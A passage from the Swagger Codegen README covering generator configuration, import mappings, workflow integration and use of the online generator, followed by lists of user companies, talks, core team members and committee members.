TypeScriptNodeClientCodegen.java
```
Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values.
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java \
-c path/to/config.json
```
and `config.json` contains the following as an example:
```json
{
"apiPackage" : "petstore"
}
```
Supported config options can be different per language. Running `config-help -l {lang}` will show available options.
**These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it)
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java
```
Output
```
CONFIG OPTIONS
modelPackage
package for generated models
apiPackage
package for generated api classes
...... (results omitted)
library
library template (sub-template) to use:
jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2
jersey2 - HTTP client: Jersey client 2.6
feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3
okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1
retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0)
retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2)
google-api-client - HTTP client: google-api-client 1.23.0. JSON processing: Jackson 2.8.9
rest-assured - HTTP client: rest-assured : 3.0.6. JSON processing: Gson 2.6.1. Only for Java8
```
Your config file for Java can look like
```json
{
"groupId":"com.my.company",
"artifactId":"MyClient",
"artifactVersion":"1.2.0",
"library":"feign"
}
```
For all the unspecified options default values will be used.
Another way to override default options is to extend the config class for the specific language.
To change, for example, the prefix for the Objective-C generated files, simply subclass the `ObjcClientCodegen.java`:
```java
package com.mycompany.swagger.codegen;
import io.swagger.codegen.languages.*;
public class MyObjcCodegen extends ObjcClientCodegen {
static {
PREFIX = "HELO";
}
}
```
and specify the `classname` when running the generator:
```
-l com.mycompany.swagger.codegen.MyObjcCodegen
```
Your subclass will now be loaded and overrides the `PREFIX` value in the superclass.
### Bringing your own models
Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell
the codegen what _not_ to create. When doing this, every location that references a specific model will
refer back to your classes. Note, this may not apply to all languages...
To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such:
```
--import-mappings Pet=my.models.MyPet
```
Or for multiple mappings:
```
--import-mappings Pet=my.models.MyPet,Order=my.models.MyOrder
```
or
```
--import-mappings Pet=my.models.MyPet --import-mappings Order=my.models.MyOrder
```
### Validating your OpenAPI Spec
You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example:
http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json
### Generating dynamic html api documentation
To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation:
```sh
cd samples/dynamic-html/
npm install
node .
```
Which launches a node.js server so the AJAX calls have a place to go.
### Generating static html api documentation
To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem:
```sh
cd samples/html/
open index.html
```
### To build a server stub
Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information.
### To build the codegen library
This will create the swagger-codegen library from source.
```sh
mvn package
```
Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts
## Workflow Integration
### Maven Integration
You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target.
### Gradle Integration
[Gradle Swagger Generator Plugin](https://github.com/int128/gradle-swagger-generator-plugin) is available for generating source code and API document.
## GitHub Integration
To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example:
1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/)
2) Generate the SDK
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \
--git-user-id "wing328" \
--git-repo-id "petstore-perl" \
--release-note "Github integration demo" \
-o /var/tmp/perl/petstore
```
3) Push the SDK to GitHub
```sh
cd /var/tmp/perl/petstore
/bin/sh ./git_push.sh
```
## Online generators
One can also generate API client or server using the online generators (https://generator.swagger.io)
For example, to generate Ruby API client, simply send the following HTTP request using curl:
```sh
curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby
```
Then you will receieve a JSON response with the URL to download the zipped code.
To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body:
```json
{
"options": {},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`:
For example, `curl https://generator.swagger.io/api/gen/clients/python` returns
```json
{
"packageName":{
"opt":"packageName",
"description":"python package name (convention: snake_case).",
"type":"string",
"default":"swagger_client"
},
"packageVersion":{
"opt":"packageVersion",
"description":"python package version.",
"type":"string",
"default":"1.0.0"
},
"sortParamsByRequiredFlag":{
"opt":"sortParamsByRequiredFlag",
"description":"Sort method arguments to place required parameters before optional parameters.",
"type":"boolean",
"default":"true"
}
}
```
To set package name to `pet_store`, the HTTP body of the request is as follows:
```json
{
"options": {
"packageName": "pet_store"
},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
and here is the curl command:
```sh
curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python
```
Instead of using `swaggerUrl` with an URL to the OpenAPI/Swagger spec, one can include the spec in the JSON payload with `spec`, e.g.
```json
{
"options": {},
"spec": {
"swagger": "2.0",
"info": {
"version": "1.0.0",
"title": "Test API"
},
...
}
}
```
Guidelines for Contribution
---------------------------
Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md)
Companies/Projects using Swagger Codegen
----------------------------------------
Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page.
- [Accengage](https://www.accengage.com/)
- [Activehours](https://www.activehours.com/)
- [Acunetix](https://www.acunetix.com/)
- [Atlassian](https://www.atlassian.com/)
- [Autodesk](http://www.autodesk.com/)
- [Avenida Compras S.A.](https://www.avenida.com.ar)
- [AYLIEN](http://aylien.com/)
- [Balance Internet](https://www.balanceinternet.com.au/)
- [beemo](http://www.beemo.eu)
- [bitly](https://bitly.com)
- [BeezUP](http://www.beezup.com)
- [Box](https://box.com)
- [Bufferfly Network](https://www.butterflynetinc.com/)
- [Cachet Financial](http://www.cachetfinancial.com/)
- [carpolo](http://www.carpolo.co/)
- [Cisco](http://www.cisco.com/)
- [CloudBoost](https://www.CloudBoost.io/)
- [Cloudsmith](https://cloudsmith.io/)
- [Conplement](http://www.conplement.de/)
- [Cummins](http://www.cummins.com/)
- [Cupix](http://www.cupix.com)
- [DBBest Technologies](https://www.dbbest.com)
- [DecentFoX](http://decentfox.com/)
- [DocRaptor](https://docraptor.com)
- [DocuSign](https://www.docusign.com)
- [Elastic](https://www.elastic.co/)
- [Ergon](http://www.ergon.ch/)
- [Dell EMC](https://www.emc.com/)
- [eureka](http://eure.jp/)
- [everystory.us](http://everystory.us)
- [Expected Behavior](http://www.expectedbehavior.com/)
- [Fastly](https://www.fastly.com/)
- [FINRA](https://github.com/FINRAOS/herd/)
- [Flat](https://flat.io)
- [Finder](http://en.finder.pl/)
- [Fitwell](https://fitwell.co/)
- [FH Münster - University of Applied Sciences](http://www.fh-muenster.de)
- [Fotition](https://www.fotition.com/)
- [Gear Zero Network](https://www.gearzero.ca)
- [General Electric](https://www.ge.com/)
- [Genesys - PureCloud](http://developer.mypurecloud.com/)
- [Germin8](http://www.germin8.com)
- [GigaSpaces](http://www.gigaspaces.com)
- [GMO Pepabo](https://pepabo.com/en/)
- [goTransverse](http://www.gotransverse.com/api)
- [GraphHopper](https://graphhopper.com/)
- [Gravitate Solutions](http://gravitatesolutions.com/)
- [HashData](http://www.hashdata.cn/)
- [Hewlett Packard Enterprise](https://hpe.com)
- [High Technologies Center](http://htc-cs.com)
- [Hootsuite](https://hootsuite.com/)
- [Huawei Cloud](http://www.huaweicloud.com/en-us/product/cs.html)
- [Husbanken](https://www.husbanken.no)
- [IBM](https://www.ibm.com)
- [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications)
- [Individual Standard IVS](http://www.individual-standard.com)
- [Intent HQ](http://www.intenthq.com)
- [Kabuku](http://www.kabuku.co.jp/en)
- [Kurio](https://kurio.co.id)
- [Kuroi](http://kuroiwebdesign.com/)
- [Kuary](https://kuary.com/)
- [Kubernetes](https://kubernetes.io/)
- [LANDR Audio](https://www.landr.com/)
- [Lascaux](http://www.lascaux.it/)
- [Leanix](http://www.leanix.net/)
- [Leica Geosystems AG](http://leica-geosystems.com)
- [LiveAgent](https://www.ladesk.com/)
- [LXL Tech](http://lxltech.com)
- [Lyft](https://www.lyft.com/developers)
- [MailMojo](https://mailmojo.no/)
- [Metaswitch](https://www.metaswitch.com/)
- [Mindera](http://mindera.com/)
- [Mporium](http://mporium.com/)
- [Neverfail](https://neverfail.com/)
- [NTT DATA](http://www.nttdata.com/)
- [nViso](http://www.nviso.ch/)
- [Okiok](https://www.okiok.com)
- [Onedata](http://onedata.org)
- [Open International Systems](https://openintl.com/)
- [OrderCloud.io](http://ordercloud.io)
- [OSDN](https://osdn.jp)
- [PagerDuty](https://www.pagerduty.com)
- [PagerTree](https://pagertree.com)
- [Pepipost](https://www.pepipost.com)
- [Peatio Tech](https://www.peatio.tech)
- [Plexxi](http://www.plexxi.com)
- [Pixoneye](http://www.pixoneye.com/)
- [PostAffiliatePro](https://www.postaffiliatepro.com/)
- [PracticeBird](https://www.practicebird.com/)
- [Prill Tecnologia](http://www.prill.com.br)
- [Prokarma](https://www.prokarma.com)
- [QAdept](http://qadept.com/)
- [QuantiModo](https://quantimo.do/)
- [QuickBlox](https://quickblox.com/)
- [Rapid7](https://rapid7.com/)
- [Red Hat](https://www.redhat.com/)
- [Reload! A/S](https://reload.dk/)
- [REstore](https://www.restore.eu)
- [REST United](https://restunited.com)
- [Revault Sàrl](http://revault.ch)
- [Riffyn](https://riffyn.com)
- [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html)
- [Saritasa](https://www.saritasa.com/)
- [SAS](https://www.sas.com)
- [SCOOP Software GmbH](http://www.scoop-software.de)
- [SessionM](https://www.sessionm.com/)
- [Shine Solutions](https://shinesolutions.com/)
- [Simpfony](https://www.simpfony.com/)
- [Skurt](http://www.skurt.com)
- [Slamby](https://www.slamby.com/)
- [SmartRecruiters](https://www.smartrecruiters.com/)
- [snapCX](https://snapcx.io)
- [SPINEN](http://www.spinen.com)
- [Sponsoo](https://www.sponsoo.de)
- [SRC](https://www.src.si/)
- [Stardog Ventures](https://www.stardog.io)
- [Stingray](http://www.stingray.com)
- [StyleRecipe](http://stylerecipe.co.jp)
- [Svenska Spel AB](https://www.svenskaspel.se/)
- [Switch Database](https://www.switchdatabase.com/)
- [TaskData](http://www.taskdata.com/)
- [ThirdWatch.ai](https://www.thirdwatch.ai/)
- [ThoughtWorks](https://www.thoughtworks.com)
- [Tpay](https://tpay.com)
- [Trexle](https://trexle.com/)
- [Upwork](http://upwork.com/)
- [uShip](https://www.uship.com/)
- [VMware](https://vmware.com/)
- [Viavi Solutions Inc.](https://www.viavisolutions.com)
- [W.UP](http://wup.hu/?siteLang=en)
- [Wealthfront](https://www.wealthfront.com/)
- [Webever GmbH](https://www.webever.de/)
- [WEXO A/S](https://www.wexo.dk/)
- [XSky](http://www.xsky.com/)
- [Yelp](http://www.yelp.com/)
- [Zalando](https://tech.zalando.com)
- [ZEEF.com](https://zeef.com/)
- [zooplus](https://www.zooplus.com/)
Presentations/Videos/Tutorials/Books
----------------------------------------
- 2011/08/31 - [Introducing Swagger](https://www.slideshare.net/fehguy/introducing-swagger) by [Tony Tam](https://twitter.com/fehguy)
- 2014/05/22 - [Swagger APIs for Humans and Robots](https://www.slideshare.net/fehguy/swagger-apis-for-humans-and-robots-gluecon) by [Tony Tam](https://twitter.com/fehguy) at [Gluecon](http://gluecon.com/)
- 2014/11/11 - [Genie 2.0: Second Wish Granted!](https://medium.com/netflix-techblog/genie-2-0-second-wish-granted-d888d79455c6) by [Tom Gianos](http://www.linkedin.com/in/thomasgianos/) and [Amit Sharma](https://www.linkedin.com/pub/amit-sharma/5/163/a83) @ [Netflix](https://www.netflix.com/) Big Data Platform Team
- 2015/07/28 - [Enriching RESTful Services with Swagger](https://blog.philipphauer.de/enriching-restful-services-swagger/) by [Philipp Hauer](https://blog.philipphauer.de/)
- 2015/11/11 - [Generate client stubs & document your REST-API using Swagger & Spring](https://www.youtube.com/watch?v=43GhBbP--oI) by [Johannes Fiala](https://github.com/jfiala) @ Devoxx Belgium 2015
- 2015/12/03 - [こんなに簡単! Swagger Codegenのカスタマイズ](http://qiita.com/Quramy/items/c583f3213f0b77ff1bac) by [Quramy](http://qiita.com/Quramy)
- 2016/01/12 - [Generate client side code using Swagger Codegen](http://rnavagamuwa.com/open-source/generate-client-side-code-using-swagger-codegen/) by [RNAVAGAMUWA](http://rnavagamuwa.com/author/admin/)
- 2016/01/15 - [How to end manual REST-API client coding](https://www.youtube.com/watch?v=RzZRdqZp6Oo) by [Johannes Fiala](https://github.com/jfiala) @ dotJS 2015
- 2016/04/27 - [Automated REST API Development](https://yos.io/2016/04/27/automated-api-development/) by [Yos Riady](https://www.linkedin.com/in/yosriady)
- 2016/05/29 - [Generating Java Spring-MVC code from Swagger Spec](https://www.clianz.com/2016/05/29/java-mvc-swagger-gen/) by [@icha024](https://github.com/icha024)
- 2016/07/22 - [Building Microservices? Here is what you should know](https://cloudncode.blog/2016/07/22/msa-getting-started/) by Sumit Maingi
- 2016/08/23 - [Generating Dreamfactory Client SDKs based on Swagger API Definitions](http://blog.dreamfactory.com/generating-dreamfactory-client-sdks-based-on-swagger-api-definitions) by [Phil Schuler](https://github.com/philicious/)
- 2016/09/28 - [1 UNBELIEVABLE TRICK TO CREATE AN EASY TO CONSUME API IN .NET](https://stapp.space/1-simple-trick-to-create-a-good-api-in-net/) by [Piotr Stapp](https://stapp.space/author/piotr-stapp/)
- 2016/10/10 - [Using swagger-codegen with Marketo](http://developers.marketo.com/blog/using-swagger-codegen-with-marketo/) by [Kenny Elkington](http://developers.marketo.com/blog/using-swagger-codegen-with-marketo/)
- 2016/10/12 - [Designing a Swagger API](https://sookocheff.com/post/api/swagger/) by [Kevin Sookocheff](https://sookocheff.com/)
- 2016/11/05 - [How to generate a REST Application](https://www.youtube.com/watch?v=iyC9BWMe75Q) by [Johannes Fiala](https://github.com/jfiala) @ DevFest Vienna 2016
- 2016/11/10 - [Building an AEM API clients ecosystem](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) by Cliffano Subagio, Michael Diender, Stephen Shim from [Shine Solutions](https://shinesolutions.com/) @ [Adobe Marketing Cloud Community Expo (AMCCE)](https://www.meetup.com/Melbourne-AEM-CQ-Meetup/events/233363101/)
- 2016/11/18 - [How to generate a REST CXF3 application from Swagger-Contract](https://www.slideshare.net/johannes_fiala/how-to-generate-a-rest-cxf3-application-from-swagger-apacheconeu-2016) by [Johannes Fiala](https://github.com/jfiala) @ ApacheConEU 2016
- 2016/11/25 - [Swagger Codegen for Swift3 and NodeJS](https://normand1.github.io/blog/swift/swagger/codegen/2016/11/25/Swagger-Codegen-for-Swift3-and-NodeJS.html) by [David Norman](https://github.com/normand1)
- 2016/12/08 - [Building an API with Swagger](https://www.youtube.com/watch?v=PbwQWw7xSOM)
- 2016/12/08 - [Generate client side code using Swagger Codegen](https://carra-lucia-ltd.co.uk/2016/12/08/generate-client-side-code-using-swagger-codegen/) by [theFerkel](https://carra-lucia-ltd.co.uk/author/theferkel/)
- 2017/01/16 - [Zero to API in 4 minutes](https://cidrblock.github.io/zero-to-api-in-4-minutes.html) by [Bradley A. Thornton](https://github.com/cidrblock)
- 2017/02/09 - [「Swaggerを利用した新規サービス開発」というタイトルで登壇して来ました](https://techblog.recochoku.jp/1055) by [recotech](https://www.slideshare.net/recotech)
- 2017/03/03 - [Swagger Codegen の使い方の簡単な説明です](https://speakerdeck.com/wagyu298/swagger-codegen) by [wagyu298](https://github.com/wagyu298)
- 2017/03/24 - [Using Open API Specification To Put Lyft SDK Support in the Fast Lane](https://medium.com/lyft-developer-platform/using-open-api-specification-to-put-lyft-sdk-support-in-the-fast-lane-7b623218e4ee) by [Val Polouchkine](https://github.com/vpolouchkine)
- 2017/04/13 - [Automatically Generating your API Client with Swagger and Swagger Codegen](https://www.youtube.com/watch?v=EzKwi-u9jQo) by [Jesse Collis](https://github.com/jessedc) @ Melbourne Cocoaheads
- 2017/04/27 - [Swagger Codegen のPHP実装があまりにアレだったので、ライブラリ自作して公開してみた](http://qiita.com/imunew/items/2e9c472e0097e329f2cd) by [imunew](http://qiita.com/imunew)
- 2017/05/17 - [Diseño de APIs con OpenAPI](https://www.slideshare.net/pjmolina/diseo-de-apis-con-openapi) by [Pedro J. Molina](https://github.com/pjmolina) @ [JSDayES 2017](http://2017.jsday.es/)
- 2017/05/22 - [Presentation of the Vert.x-Swagger project](http://vertx.io/blog/presentation-of-the-vert-x-swagger-project/) by [@phiz71](http://github.com/phiz71)
- 2017/05/22 - [Automatically generating your API from a swagger file using gradle](https://www.jcore.com/2017/05/22/automatically-generating-api-using-swagger-and-gradle/) by [Deniz Turan](https://www.jcore.com/author/deniz/)
- 2017/06/21 - [Swagger Presentation - Warsaw Ruby Users Group](https://www.youtube.com/watch?v=uCnnDMFQB8U) by [@rafalpetryka](http://github.com/rafalpetryka)
- 2017/06/29 - [Making SDKs: the bespoke, the hopeful and the generated](https://devrel.net/developer-experience/making-sdks-bespoke-hopeful-generated) by [Tristan Sokol](https://github.com/tristansokol) ([Square](https://github.com/square)) at DevXcon 2017
- 2017/07/11 - [OpenAPI development with Python](https://www.slideshare.net/TakuroWada/20170711-euro-python2017) by [和田拓朗](https://github.com/taxpon) at [EuroPython 2017](https://ep2017.europython.eu/en/)
- 2017/07/29 - [How Square makes its SDKs](https://medium.com/square-corner-blog/how-square-makes-its-sdks-6a0fd7ea4b2d) by [Tristan Sokol](https://github.com/tristansokol) ([Square](https://github.com/square))
- 2017/07/31 - [How to Generate a Deployable REST CXF3 Application from a Swagger-Contract](https://www.youtube.com/watch?v=gM63rJlUHZQ) by [Johannes Fiala](https://github.com/jfiala) @ Voxxed Days Vienna
- 2017/08/11 - [Swagger Codegen 自动生成Retrofit 代码](https://juejin.im/entry/598d8eb86fb9a03c52459e2a) by [徐磊](http://www.jianshu.com/u/792c738b33fc)
- 2017/08/24 - [APIs First](https://engineering.squarespace.com/blog/2017/apis-first) by [roykachouh](https://github.com/roykachouh) ([Square](https://github.com/square))
- 2017/08/31 - [Bringing Jenkins Remote Access API To The Masses](http://blog.cliffano.com/2017/09/01/jenkins-world-2017/) by [Cliffano Subagio](http://cliffano.com) from [Shine Solutions](https://shinesolutions.com/) @ [Jenkins World 2017](https://jenkinsworld20162017.sched.com/)
- 2017/09/08 - [Swagger Codegen で自動生成したクライアントSDKを使う(iOS編)](http://blog.techium.jp/entry/2017/09/08/071650) by [kfurue](http://profile.hatena.ne.jp/kfurue/)
- 2017/09/09 - [Swagger Codegen で自動生成したクライアントSDKを使う(RxSwift 編)](http://blog.techium.jp/entry/2017/09/09/113003) by [kfurue](http://profile.hatena.ne.jp/kfurue/)
- 2017/09/09 - [OpenAPIを利用したPythonWebアプリケーション開発](https://www.slideshare.net/TakuroWada/openapipythonweb) by [和田拓朗](https://github.com/taxpon) at [PyCon JP 2017](https://pycon.jp/2017/ja/)
- 2017/09/21 - [Generating an Elastic Cloud Enterprise Client](https://www.elastic.co/blog/generating-an-elastic-cloud-enterprise-client) by [Greg Marzouka](https://github.com/gmarz) ([Elastic](https://www.elastic.co/))
- 2017/09/26 - [How to Use IoT Application Enablement Api Hub JSON Descriptor in Postman and How to Generate Client Code](https://www.linkedin.com/in/radu-simen/) by [Radu Simen](https://www.linkedin.com/in/radu-simen/) ([SAP](https://www.sap.com/))
- 2017/09/28 - [Swagger Codegenで APIクライアントgem 自動生成 #m3kt](https://speakerdeck.com/juntaki/swagger-codegende-apikuraiantogem-zi-dong-sheng-cheng-number-m3kt) by [Jumpei Takiyasu](https://github.com/juntaki)
- 2017/09/30 - [Swaggerのテンプレートを魔改造した話 #渋谷java](https://www.slideshare.net/int128/swagger-80309224) by [Hidetake Iwata](https://github.com/int128) ([NTT DATA Corporation](http://www.nttdata.com/global/en/))
- 2017/10/04 - [Enterprise-friendly Java client for Microsoft Machine Learning Server](https://blogs.msdn.microsoft.com/mlserver/2017/10/04/enterprise-friendly-java-client-for-microsoft-machine-learning-server/) by [Pratik Palnitkar](https://www.linkedin.com/in/pratikpalnitkar/) ([Microsoft](https://www.microsoft.com/))
- 2017/10/08 - [Generating a REST Ada client with OpenAPI and Swagger Codegen](https://blog.vacs.fr/vacs/blogs/post.html?post=2017/10/08/Generating-a-REST-Ada-client-with-OpenAPI-and-Swagger-Codegen) by [Stephane Carrez](https://github.com/stcarrez)
- 2017/11/08 - [A Beginner's Guide to Code Generation for REST APIs](https://gum.co/swagger_codegen_beginner)(eBook) by [William Cheng](https://twitter.com/wing328)
- 2017/11/18 - [10年前のレガシーシステムをサーバーサイドKotlinでフルリニューアルしている話 #jjug_ccc #ccc_g2](https://speakerdeck.com/maeharin/10nian-qian-falseregasisisutemuwosabasaidokotlindehururiniyuarusiteiruhua-number-jjug-ccc-number-ccc-g2) by [Hidenori Maehara](https://github.com/maeharin)
- 2017/11/21 - [swagger-codegen から眺める Swift4](https://speakerdeck.com/d_date/swagger-codegen-karatiao-meru-swift4) by [Daiki Matsudate](https://github.com/d-date)
- 2017/12/07 - [API-driven development with OpenAPI and Swagger, Part 2](https://www.itworld.com/article/3199190/apis/api-driven-development-with-openapi-and-swagger-part-2.html) by Matthew Tyson
- 2017/12/29 - [REST APIs代码生成指南](https://gumroad.com/l/swagger_codegen_beginner_zh)(eBook) by [William Cheng](https://github.com/wing328), [Xin Meng](https://github.com/xmeng1)
- 2017/12/21 - [Using Protocol Buffer to Generate SDK at Hootsuite](http://code.hootsuite.com/using-protocol-buffer-to-generate-sdk-at-hoosuite/?lipi=urn%3Ali%3Apage%3Ad_flagship3_messaging%3By4ATz3SDRXyvXJJ14LQysQ%3D%3D) by [Joy Zhang](https://www.linkedin.com/in/joy8zhang/)
- 2018/01/11 - [Swagger 工具箱介绍及代码自动生成示例](https://github.com/qct/swagger-example) by [qct](https://github.com/qct)
- 2018/01/19 - [Generowanie kodu usług REST - przewodnik dla początkujących](https://gum.co/swagger_codegen_beginner_pl)(eBook) by [William Cheng](https://github.com/wing328), [Tomasz Prus](https://github.com/tomplus), [Bartek Kryza](https://github.com/bkryza)
- 2018/02/03 - [Writing REST APIs with OpenAPI and Swagger Ada](https://www.slideshare.net/StephaneCarrez1/writing-rest-apis-with-openapi-and-swagger-ada/StephaneCarrez1/writing-rest-apis-with-openapi-and-swagger-ada) by [Stephane Carrez](https://github.com/stcarrez) at [FOSDEM 2018](https://fosdem.org/2018)
# Swagger Codegen Core Team
Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis.
## Core Team Members
* [@jimschubert](https://github.com/jimschubert)
* [@cbornet](https://github.com/cbornet)
* [@jaz-ah](https://github.com/jaz-ah)
## Template Creator
Here is a list of template creators:
* API Clients:
* Ada: @stcarrez
* Akka-Scala: @cchafer
* Apex: @asnelling
* Bash: @bkryza
* C++ REST: @Danielku15
* C# (.NET 2.0): @who
* C# (.NET Standard 1.3 ): @Gronsak
* C# (.NET 4.5 refactored): @jimschubert
* Clojure: @xhh
* Dart: @yissachar
* Dart (refactored in 2.4.0): @joernahrens
* Elixir: @niku
* Elm: @trenneman
* Eiffel: @jvelilla
* Erlang: @tsloughter
* Groovy: @victorgit
* Go: @wing328
* Go (rewritten in 2.3.0): @antihax
* Haskell (http-client): @jonschoning
* Java (Feign): @davidkiss
* Java (Retrofit): @0legg
* Java (Retrofit2): @emilianobonassi
* Java (Jersey2): @xhh
* Java (okhttp-gson): @xhh
* Java (RestTemplate): @nbruno
* Java (RESTEasy): @gayathrigs
* Java (Vertx): @lopesmcc
* Java (Google APIs Client Library): @charlescapps
* Java (Rest-assured): @viclovsky
* Javascript/NodeJS: @jfiala
* Javascript (Closure-annotated Angular) @achew22
* JMeter: @davidkiss
* Kotlin: @jimschubert
* Lua: @daurnimator
* Perl: @wing328
* PHP (Guzzle): @baartosz
* PowerShell: @beatcracker
* R: @ramnov
* Rust: @farcaller
* Rust (rust-server): @metaswitch
* Scala (scalaz & http4s): @tbrown1979
* Swift: @tkqubo
* Swift 3: @hexelon
* Swift 4: @ehyche
* TypeScript (Node): @mhardorf
* TypeScript (Angular1): @mhardorf
* TypeScript (Fetch): @leonyu
* TypeScript (Angular2): @roni-frantchi
* TypeScript (jQuery): @bherila
* Server Stubs
* Ada: @stcarrez
* C# ASP.NET5: @jimschubert
* C# NancyFX: @mstefaniuk
* C++ Pistache: @sebymiano
* C++ Restbed: @stkrwork
* Erlang Server: @galaxie
* Go Server: @guohuang
* Haskell Servant: @algas
* Java MSF4J: @sanjeewa-malalgoda
* Java Spring Boot: @diyfr
* Java Undertow: @stevehu
* Java Play Framework: @JFCote
* Java PKMST: @anshu2185 @sanshuman @rkumar-pk @ninodpillai
* JAX-RS RestEasy: @chameleon82
* JAX-RS CXF: @hiveship
* JAX-RS CXF (CDI): @nickcmaynard
* JAX-RS RestEasy (JBoss EAP): @jfiala
* Kotlin: @jimschubert
* PHP Lumen: @abcsun
* PHP Slim: @jfastnacht
* PHP Symfony: @ksm2
* PHP Zend Expressive (with Path Handler): @Articus
* Ruby on Rails 5: @zlx
* Rust (rust-server): @metaswitch
* Scala Finch: @jimschubert
* Scala Lagom: @gmkumar2005
* Documentation
* HTML Doc 2: @jhitchcock
* Confluence Wiki: @jhitchcock
* Configuration
* Apache2: @stkrwork
## How to join the core team
Here are the requirements to become a core team member:
- rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors
- to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22)
- regular contributions to the project
- about 3 hours per week
- for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc
To join the core team, please reach out to [email protected] (@wing328) for more information.
To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator.
# Swagger Codegen Technical Committee
Members of the Swagger Codegen technical committee shoulder the following responsibilities:
- Provides guidance and direction to other users
- Reviews pull requests and issues
- Improves the generator by making enhancements, fixing bugs or updating documentations
- Sets the technical direction of the generator
Who is eligible? Those who want to join must have at least 3 PRs merged into a generator. (Exceptions can be granted to template creators or contributors who have made a lot of code changes with less than 3 merged PRs)
If you want to join the committee, please kindly apply by sending an email to [email protected] ([@wing328](https://github.com/wing328)) with your Github ID.
## Members of Technical Committee
| Languages | Member (join date) |
|:-------------|:-------------|
| ActionScript | |
| Android | @jaz-ah (2017/09) |
| Apex | |
| Bash | @frol (2017/07) @bkryza (2017/08) @kenjones-cisco (2017/09) |
| C++ | @ravinikam (2017/07) @stkrwork (2017/07) @fvarose (2017/11) |
| C# | @mandrean (2017/08) @jimschubert (2017/09) |
| Clojure | |
| Dart | @ircecho (2017/07) |
| Eiffel | @jvelilla (2017/09) |
| Elixir | |
| Elm | |
| Erlang | @tsloughter (2017/11) |
| Groovy | |
| Go | @antihax (2017/11) @bvwells (2017/12) |
| Haskell | |
| Java | @bbdouglas (2017/07) @JFCote (2017/08) @sreeshas (2017/08) @jfiala (2017/08) @lukoyanov (2017/09) @cbornet (2017/09) @jeff9finger (2018/01) |
| Kotlin | @jimschubert (2017/09) |
| Lua | @daurnimator (2017/08) |
| NodeJS/Javascript | @CodeNinjai (2017/07) @frol (2017/07) @cliffano (2017/07) |
| ObjC | |
| Perl | @wing328 (2017/07) |
| PHP | @jebentier (2017/07) @dkarlovi (2017/07) @mandrean (2017/08) @jfastnacht (2017/09) @ackintosh (2017/09) |
| Python | @taxpon (2017/07) @frol (2017/07) @mbohlool (2017/07) @cbornet (2017/09) @kenjones-cisco (2017/11)|
| R | |
| Ruby | @cliffano (2017/07) @zlx (2017/09) |
| Rust | @frol (2017/07) @farcaller (2017/08) @bjgill (2017/12) |
| Scala | @clasnake (2017/07) @jimschubert (2017/09) @shijinkui (2018/01) |
| Swift | @jgavris (2017/07) @ehyche (2017/08) @Edubits (2017/09) @jaz-ah (2017/09) |
| TypeScript | @TiFu (2017/07) @taxpon (2017/07) @sebastianhaas (2017/07) @kenisteward (2017/07) @Vrolijkx (2017/09) @macjohnny (2018/01) |
# License information on Generated Code
The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points:
* The templates included with this project are subject to the [License](#license).
* Generated code is intentionally _not_ subject to the parent project license
